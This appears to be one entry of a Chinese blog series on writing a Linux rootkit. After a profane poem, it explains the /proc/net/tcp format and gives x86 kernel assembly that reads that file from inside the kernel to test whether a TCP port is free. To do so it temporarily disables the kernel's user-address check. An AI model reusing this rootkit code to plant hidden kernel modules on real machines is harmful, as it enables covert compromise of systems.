rootkit for linux 16.获取tcp可用端口号

我说我很愤怒

你说你理解我

我说 那不可能

你说真的 我说那我考考你

帮你爸一忙

你媳妇大肚子

傻*照镜子

 

你知道什么意思么

你微笑着说  不

我说 我来解释给你

他们是

 

我*你妈

装你MA孙子

瞅你*德行

 

现在 你理解我的愤怒了么?

 

                  ----摘自《活不明白》

 

 

每个人都有自己的愤怒。你有自己的愤怒吗？如果没有，去听听Woods Of Infinity、Burzum、Nargaroth你就明白了。

 

今天我想说的是，我们要用tcpip传输数据，怎么知道某个本地端口是否已经被内核使用了呢？

我们都知道用netstat命令可以看到所有socket的信息，我们现在不用看到所有socket的信息，只需要看到tcp socket的信息就行了。

strace netstat的记录表明，它通过读取/proc/net/tcp来获取相应的socket信息。

来看看/proc/net/tcp的格式：

 

  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                    
   0: 0100A8C0:9CAF 0200A8C0:008B 01 00000000:00000000 00:00000000 00000000     0        0 9960 3 dba79b40 61 12 1 2 -1                             

看到没。有人一定会问，这是啥j8东西啊？

 

sl：socket编号

local_address：本地地址和端口号

rem_address：远程地址和端口号

st：tcp状态

enum {
 TCP_ESTABLISHED = 1,
 TCP_SYN_SENT,
 TCP_SYN_RECV,
 TCP_FIN_WAIT1,
 TCP_FIN_WAIT2,
 TCP_TIME_WAIT,
 TCP_CLOSE,
 TCP_CLOSE_WAIT,
 TCP_LAST_ACK,
 TCP_LISTEN,
 TCP_CLOSING, /* Now a valid state */

 TCP_MAX_STATES /* Leave at the end! */
};
tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ：这几个我们就别管了吧。

 

那好办，就直接读取这个文件就行了。

 

2. // fastcall int tcp_get_port(int port);
3. // @port: the port you want to bind
4. // @return: if the port is avail, returns 1, otherwise 0.
5. EXPORT_LABEL(tcp_get_port)
6.     PUSH_ALL
7.     subl $0x38, %esp
9.     movl %eax, 0x2c(%esp)
11.     movl $1024, %esi
12.     
13.     // cancal user check
14.     movl %esp, %eax 
15.     andl $0xffffe000, %eax 
16.     movl 0x18(%eax), %ebx 
17.     movl %ebx, 0x30(%esp)
18.     movl $0xffffffff, 0x18(%eax)
20. 2:
21.     // buf = __kmalloc(size, GFP_KERNEL);
22.     GET_VAL32(__kmalloc, %ebp)
23.     movl %esi, %eax
24.     movl $0xd0, %edx
25.     call *%ebp
26.     testl %eax, %eax
27.     jz tcp_get_port_out
28.     movl %eax, %edi
30.     // file = filp_open("/proc/net/tcp", O_RDONLY, 0);
31.     GET_VAL32(filp_open, %ebp)
32.     GET_STR("/proc/net/tcp", %eax)
33.     xorl %edx, %edx
34.     xorl %ecx, %ecx
35.     call *%ebp
36.     testl %eax, %eax
37.     jz tcp_get_port_out
38.     movl %eax, 0x34(%esp)
40.     // *pos = 0;
41.     movl $0, 0x4(%esp)
42.     movl $0, 0x8(%esp)
44.     // ret = file->f_op->read(file, buf, size, pos);
45.     movl 0x34(%esp), %edx
46.     GET_STRUCT_VAL32(%edx, file.f_op, %ecx)
47.     GET_STRUCT_VAL32(%ecx, file_operations.read, %ebp)
48.     leal 0x4(%esp), %eax
49.     movl %eax, (%esp)
50.     movl %edx, %eax
51.     movl %edi, %edx
52.     movl %esi, %ecx
53.     call *%ebp
55.     // if (IS_ERR(ret)) goto out_restore;
56.     testl %eax, %eax
57.     js tcp_get_port_out_restore
58.     
59.     /* if (ret != count) 
60.      *      // complete read
61.      * else {
62.      *      size *= 2;
63.      *      // malloc and read again
64.      * }
65.      */
66.     cmpl %eax, %esi
67.     jnz 1f
69.     // kfree(buf);
70.     GET_VAL32(kfree, %ebp)
71.     movl %edi, %eax
72.     call *%ebp
74.     // filp_close(file, 0);
75.     GET_VAL32(filp_close, %ebp)
76.     movl 0x34(%esp), %eax
77.     xorl %edx, %edx
78.     call *%ebp
80.     shl $1, %esi
82. #ifdef _DEBUG_
83.     movl %esi, 0x4(%esp)
84.     DPRINT("<3>try new size %x/n")
85. #endif
86.     
87.     jmp 2b
89. 1:  // read ok
90.     movl %eax, %esi
92.     // filp_close(file, 0);
93.     GET_VAL32(filp_close, %ebp)
94.     movl 0x34(%esp), %eax
95.     xorl %edx, %edx
96.     call *%ebp
97.     
98.     movl %esi, %ecx
99.     movl %ecx, 0x34(%esp)
101.     // skip the title
102.     movb $'/n', %al
103.     cld; repne scasb
104.     incl %edi
105.     movl %edi, %esi
107. 2:
108.     // find '/n' in content, replace it with '/0'
109.     movb $'/n', %al
110.     movl 0x34(%esp), %ecx
111.     cld; repne scasb
112.     jz 3f
113.     
114. #ifdef _DEBUG_
115.     DPRINT("<3>read end/n")
116. #endif
118.     jmp tcp_get_port_out_restore
120. 3:  movb $'/0', (%edi)
121.     incl %edi
122.     movl %ecx, 0x34(%esp)
124.     // sscanf(line, "%x: %x:%x", &stack[0x14], &stack[0x18], &stack[0x1c]);
125.     GET_VAL32(sscanf, %ebp)
126.     movl %esi, (%esp)
127.     GET_STR("%x: %x:%x", %eax)
128.     movl %eax, 0x4(%esp)
129.     leal 0x14(%esp), %eax
130.     movl %eax, 0x8(%esp)
131.     leal 0x18(%esp), %eax
132.     movl %eax, 0xc(%esp)
133.     leal 0x1c(%esp), %eax
134.     movl %eax, 0x10(%esp)
135.     call *%ebp
137. #ifdef _DEBUG_
138.     movl 0x14(%esp), %eax
139.     movl %eax, 0x4(%esp)
140.     movl 0x18(%esp), %eax
141.     movl %eax, 0x8(%esp)
142.     movl 0x1c(%esp), %eax
143.     movl %eax, 0xc(%esp)
144.     DPRINT("<3>sock:%x local_addr:%x local_port:%x/n")
145. #endif
147.     movl 0x1c(%esp), %eax
148.     cmpl %eax, 0x2c(%esp)
149.     jnz 3f
151. #ifdef _DEBUG_
152.     DPRINT("<3>port found/n")
153. #endif
154.     jmp tcp_get_port_out_restore
156. 3:
157.     // get next line
158.     movl %edi, %esi
159.     jmp 2b
161. tcp_get_port_out_restore:
162.     // restore user check
163.     movl %esp, %ebx 
164.     andl $0xffffe000, %ebx 
165.     movl 0x30(%esp), %ecx 
166.     movl %ecx, 0x18(%ebx)
168. tcp_get_port_out:
169.     addl $0x38, %esp
170.     POP_ALL
171.     ret
172.     

其实今天的文章，也没什么技术含量，不过我还是要写，因为我现在tmd太无聊了。